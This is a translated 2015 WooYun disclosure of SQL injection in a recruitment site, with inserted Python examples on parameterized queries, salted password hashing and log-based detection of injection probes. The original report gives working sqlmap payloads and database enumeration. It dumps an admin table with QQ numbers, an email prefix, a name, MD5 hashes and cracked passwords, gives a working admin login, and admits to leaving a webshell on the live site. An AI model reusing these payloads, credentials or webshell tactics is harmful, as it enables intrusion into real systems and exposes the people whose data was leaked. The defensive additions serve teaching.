Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0136001
Title: SQL injection on a job-recruitment site leaks a large number of résumés and company records and allows a shell
Vendor: 众信人才中介服务有限公司
Author: me1ody
Submitted: 2015-08-25 21:49
Fix date: 2015-10-11 09:08
Disclosed: 2015-10-11 09:08
Type: SQL injection
Severity: High
Self-assessed rank: 16
Status: handed to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling
Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure timeline:

2015-08-25: Details sent to the vendor; awaiting the vendor's handling
2015-08-27: CNCERT (National Internet Emergency Center) has not yet been able to reach the responsible organization; details disclosed only to the notifying body
2015-09-06: Details disclosed to core white hats and experts in the relevant field
2015-09-16: Details disclosed to regular white hats
2015-09-26: Details disclosed to intern white hats
2015-10-11: Details disclosed to the public

Summary:

120,000 résumés
More than 20,000 company records
More than 20 sites affected
SQL injection
getshell

Details:

Injection point

http://**.**.**.**/detail.php?id=62970
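The injection point above is a numeric `id` parameter that the application evidently splices into a quoted SQL literal, which is why sqlmap's boolean-based payload (`62970' AND 8205=8205 AND 'xqPF'='xqPF`) works. The following added example, which is not part of this report and not the site's PHP code, models that lookup in an in-memory SQLite table (the real schema is not on the page, so the table and rows are constructed) and contrasts it with a bound-parameter version and an integer-validated version. The false-condition payload is a constructed twin of the page's true-condition one.

```python
import sqlite3

# Constructed stand-in for the site's detail table; the real schema is not on the page.
ROWS = [
    (62970, "Senior PHP developer", "Example Co."),
    (62971, "Accountant", "Sample Ltd."),
]

# The boolean-based payload sqlmap reported, and a constructed false-condition twin.
TRUE_PAYLOAD = "62970' AND 8205=8205 AND 'xqPF'='xqPF"
FALSE_PAYLOAD = "62970' AND 8205=8206 AND 'xqPF'='xqPF"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE jobs (id INTEGER PRIMARY KEY, title TEXT, company TEXT)")
    conn.executemany("INSERT INTO jobs VALUES (?, ?, ?)", ROWS)
    return conn


def vulnerable_lookup(conn, id_param):
    """Flawed pattern: the raw GET value is concatenated into the SQL text, so a
    single quote closes the literal and the rest of the WHERE clause is attacker data."""
    sql = "SELECT id, title, company FROM jobs WHERE id = '" + id_param + "'"
    return conn.execute(sql).fetchall()


def parameterized_lookup(conn, id_param):
    """Hardened form: the value is bound as a parameter and compared as data only."""
    sql = "SELECT id, title, company FROM jobs WHERE id = ?"
    return conn.execute(sql, (id_param,)).fetchall()


def validated_lookup(conn, id_param):
    """Defence in depth: the parameter is an integer by design, so reject anything
    else before it reaches the database, then still bind it."""
    if not (id_param.isascii() and id_param.isdigit()):
        raise ValueError("id must be a non-negative integer")
    return parameterized_lookup(conn, int(id_param))


def blind_oracle_exists(lookup, conn):
    """True when the lookup answers differently to a true and a false injected
    condition; that difference is exactly what boolean-based blind injection reads."""
    try:
        return lookup(conn, TRUE_PAYLOAD) != lookup(conn, FALSE_PAYLOAD)
    except ValueError:
        return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable oracle:", blind_oracle_exists(vulnerable_lookup, db))        # True
    print("parameterized oracle:", blind_oracle_exists(parameterized_lookup, db))  # False
    print("validated oracle:", blind_oracle_exists(validated_lookup, db))          # False
```

With the concatenated query the true payload returns the row for 62970 and the false payload returns nothing, which is the one-bit oracle sqlmap used to enumerate the databases below; the bound-parameter version treats the whole string as a value and returns nothing for either, and the validated version rejects it outright.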


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=62970' AND 8205=8205 AND 'xqPF'='xqPF
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=62970' AND (SELECT 4151 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(4151=4151,1))),0x716a716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sjxy'='sjxy
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: id=62970' AND (SELECT * FROM (SELECT(SLEEP(60)))JgaB) AND 'MDxp'='MDxp
Type: UNION query
Title: MySQL UNION query (NULL) - 28 columns
Payload: id=-7173' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x78754c674e4669727650,0x716a716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
available databases [7]:
[*] cacti
[*] information_schema
[*] mysql
[*] rencai_2012
[*] rencai_2014
[*] rencai_201407
[*] test
current database: 'rencai_2012'
Database: rencai_2012
[60 tables]
+----------------------+
| ins_ad |
| ins_adboard |
| ins_admin |
| ins_admin_role |
| ins_admin_role_priv |
| ins_article |
| ins_article_cate |
| ins_attatch |
| ins_company |
| ins_company_cate |
| ins_company_comments |
| ins_company_contact |
| ins_company_diytpl |
| ins_company_favs |
| ins_company_info |
| ins_company_invite |
| ins_company_sites |
| ins_company_top |
| ins_company_upgrade |
| ins_company_vip |
| ins_company_window |
| ins_content_cate |
| ins_flink |
| ins_flink_cate |
| ins_gonggao |
| ins_headhunter |
| ins_help |
| ins_hh_config |
| ins_hh_content |
| ins_hh_content_cate |
| ins_hh_cooperation |
| ins_hh_news |
| ins_hh_news_cate |
| ins_hh_online_order |
| ins_hh_partners |
| ins_jobs |
| ins_jobs_cate |
| ins_jobs_complaint |
| ins_jobs_contact |
| ins_jobs_info |
| ins_mail_queue |
| ins_menu |
| ins_mess |
| ins_nav |
| ins_sendresume |
| ins_session |
| ins_setting |
| ins_site_content |
| ins_sites |
| ins_sms_queue |
| ins_users |
| ins_users_black |
| ins_users_cate |
| ins_users_catepar |
| ins_users_favs |
| ins_users_sites |
| ins_viewresume |
| ins_weixin |
| ins_work_position |
| ins_worker |
+----------------------+
Database: rencai_2012
Table: ins_admin
[6 entries]
+----+---------+---------+---------------+---------------------+-----------+-------------+----------+-------------------------------------------+
| id | role_id | site_id | qq | email | lastip | username | lasttime | password |
+----+---------+---------+---------------+---------------------+-----------+-------------+----------+-------------------------------------------+
| 1 | 2 | 0 | 951636692(王康) | 951636692@**.**.**.** | **.**.**.** | kfwn | 2009 | 13e311484e63b35e06c0a3718787d609(67939030) |
| 2 | 2 | 0 | 1525950257 | 1525950257@**.**.**.** | **.**.**.** | kfaz | 2009 | 13e311484e63b35e06c0a3718787d609 |
| 3 | 8 | 0 | <blank> | wang1978223@**.**.**.** | **.**.**.** | wn | 2009 | e5cf362e3b023b7141c9dd8575b14272 (008800) |
| 4 | 2 | 0 | 2577402148 | 2577402148@**.**.**.** | **.**.**.** | kfdk | 2010 | d41d8cd98f00b204e9800998ecf8427e () |
| 5 | 2 | 0 | 1269122938 | 1269122938@**.**.**.** | **.**.**.** | chenchunhua | 2010 | b51e8dbebd4ba8a8f342190a4b9f08d7 (456456) |
| 6 | 7 | 0 | <blank> | <blank> | **.**.**.** | wurentupian | 2010 | bc498a180d802e984493259367c9e10b |
+----+---------+---------+---------------+---------------------+-----------+-------------+----------+-------------------------------------------+
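The dump above shows why the admin accounts fell immediately: the `password` column holds bare 32-hex MD5 digests with no per-user salt, two accounts share the same digest, and account 4 (`kfdk`) stores `d41d8cd98f00b204e9800998ecf8427e`, which is MD5 of the empty string, i.e. no password at all. The following added example, not part of the report and not the site's code, audits rows constructed from that table for exactly those two signals (no cracking involved) and shows the storage format to migrate to: a random per-user salt with a slow KDF (PBKDF2-HMAC-SHA256 here, chosen for this example because it is in the standard library; the iteration count is an assumption).

```python
import hashlib
import hmac
import os

# (username, stored hash) pairs constructed from the ins_admin dump in the report.
ADMIN_ROWS = [
    ("kfwn", "13e311484e63b35e06c0a3718787d609"),
    ("kfaz", "13e311484e63b35e06c0a3718787d609"),
    ("wn", "e5cf362e3b023b7141c9dd8575b14272"),
    ("kfdk", "d41d8cd98f00b204e9800998ecf8427e"),
    ("chenchunhua", "b51e8dbebd4ba8a8f342190a4b9f08d7"),
    ("wurentupian", "bc498a180d802e984493259367c9e10b"),
]

# MD5 of the empty string: an account with this digest has no password set.
EMPTY_MD5 = hashlib.md5(b"").hexdigest()  # d41d8cd98f00b204e9800998ecf8427e


def audit_md5_table(rows):
    """Flags what is visible without any cracking: accounts whose digest is MD5("")
    and groups of accounts sharing one digest (identical passwords, and proof that
    the scheme is unsalted, since a salt would make equal passwords hash differently)."""
    findings = {"empty_password": [], "shared_hash": {}}
    by_hash = {}
    for user, digest in rows:
        if digest == EMPTY_MD5:
            findings["empty_password"].append(user)
        by_hash.setdefault(digest, []).append(user)
    findings["shared_hash"] = {h: users for h, users in by_hash.items() if len(users) > 1}
    return findings


# Replacement storage: per-user random salt plus a deliberately slow KDF.
ITERATIONS = 200_000  # assumption for this example; tune to the server's budget


def hash_password(password, salt=None):
    """Returns a self-describing string: algorithm$iterations$salt_hex$digest_hex."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), dk.hex())


def verify_password(password, stored):
    """Recomputes the KDF with the stored salt and compares in constant time."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    report = audit_md5_table(ADMIN_ROWS)
    print("accounts with an empty password:", report["empty_password"])  # ['kfdk']
    print("accounts sharing a hash:", report["shared_hash"])
    stored = hash_password("example-only")
    print("verify correct:", verify_password("example-only", stored))    # True
    print("verify wrong:", verify_password("not-it", stored))            # False
```

Because the old digests cannot be converted to the new format without the plaintext, the practical migration is to force a reset for every flagged account, and for the rest to re-hash with `hash_password` at the next successful login and then drop the MD5 column.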


Hashes decrypted at http://**.**.**.**
Admin backend address

http://**.**.**.**/admin.php


Account / password

wn 008800


[Screenshots: 1.png, 2.png, 3.png, 5.png, 4.png]


I won't say more, you all understand. Please delete the one-line webshell (一句话) yourselves, thanks.
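Every probe in the sqlmap output above passed through the site's Apache 2.2.15 access log in URL-encoded form, so the enumeration was detectable while it was happening. The following added example (not part of the report, and not the site's tooling) parses constructed Apache combined-format lines whose requests mirror the payload shapes listed in the report, and flags them by two independent signals: a non-numeric value in a parameter the application treats as an integer, and the textual fingerprints of the four injection techniques sqlmap named (SLEEP, UNION SELECT, CONCAT with 0x markers, INFORMATION_SCHEMA, and a quoted tautology). The User-Agent strings are constructed; sqlmap's default agent does contain the word "sqlmap", but that is a weak signal because it is trivially changed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-format lines; the encoded query strings reproduce the
# payload shapes from the report's sqlmap output. Addresses are documentation ranges.
SAMPLE_LOG = r"""
203.0.113.9 - - [25/Aug/2015:21:40:01 +0800] "GET /detail.php?id=62970 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.9 - - [25/Aug/2015:21:40:02 +0800] "GET /detail.php?id=62970%27%20AND%208205%3D8205%20AND%20%27xqPF%27%3D%27xqPF HTTP/1.1" 200 8123 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.9 - - [25/Aug/2015:21:40:03 +0800] "GET /detail.php?id=62970%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%2860%29%29%29JgaB%29%20AND%20%27MDxp%27%3D%27MDxp HTTP/1.1" 200 8123 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.9 - - [25/Aug/2015:21:40:04 +0800] "GET /detail.php?id=-7173%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7178787871%2C0x78754c674e4669727650%2C0x716a716b71%29%2CNULL%23 HTTP/1.1" 200 9001 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
198.51.100.4 - - [25/Aug/2015:21:41:00 +0800] "GET /detail.php?id=62971 HTTP/1.1" 200 7990 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Parameters the application treats as integers (assumed from the injection point).
NUMERIC_PARAMS = {"id"}

# Fingerprints of the techniques listed in the report's sqlmap output.
SIGNATURES = [
    ("time-based blind (SLEEP)", re.compile(r"\bsleep\s*\(", re.I)),
    ("UNION-based", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("error-based (CONCAT/0x marker)", re.compile(r"concat\s*\(\s*0x[0-9a-f]+", re.I)),
    ("schema enumeration", re.compile(r"information_schema", re.I)),
    ("boolean tautology", re.compile(r"'\s*and\s+\d+\s*=\s*\d+", re.I)),
]


def parse_line(line):
    """Splits one combined-format line into its fields, or returns None."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def inspect_request(entry):
    """Returns the reasons a parsed entry looks like injection probing ([] if none)."""
    reasons = []
    query = urlsplit(entry["target"]).query
    # parse_qsl percent-decodes, so the signatures run over what the DBMS would see.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
            reasons.append(f"non-numeric value in numeric parameter {name!r}")
        for label, rx in SIGNATURES:
            if rx.search(value):
                reasons.append(f"{label} pattern in parameter {name!r}")
    if "sqlmap" in entry["ua"].lower():
        reasons.append("sqlmap default User-Agent")
    return reasons


def analyse_log(text):
    """Runs inspect_request over every parsable line and returns the flagged ones."""
    hits = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = inspect_request(entry)
        if reasons:
            hits.append({"ip": entry["ip"], "time": entry["time"],
                         "target": entry["target"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in analyse_log(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["target"][:60])
        for reason in hit["reasons"]:
            print("   -", reason)
```

On the sample, the two plain lookups are left alone and the three probes are flagged, each on the numeric-parameter check alone even before a technique signature fires; that first rule is the one worth alerting on in production, since it is independent of how the payload is spelled.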

Proof of vulnerability:

[Screenshots: 1.png, 2.png, 3.png, 5.png, 4.png]

Remediation:

I won't say more, you all understand. Please delete the one-line webshell (一句话) yourselves, thanks.

Copyright notice: when reposting, credit the source me1ody@乌云


Responses

Vendor response:

Severity: High

Rank: 11

Confirmed: 2015-08-27 09:07

Vendor reply:

No direct handling channel with the organization administering the site has been established yet; awaiting claim.

Latest status:

None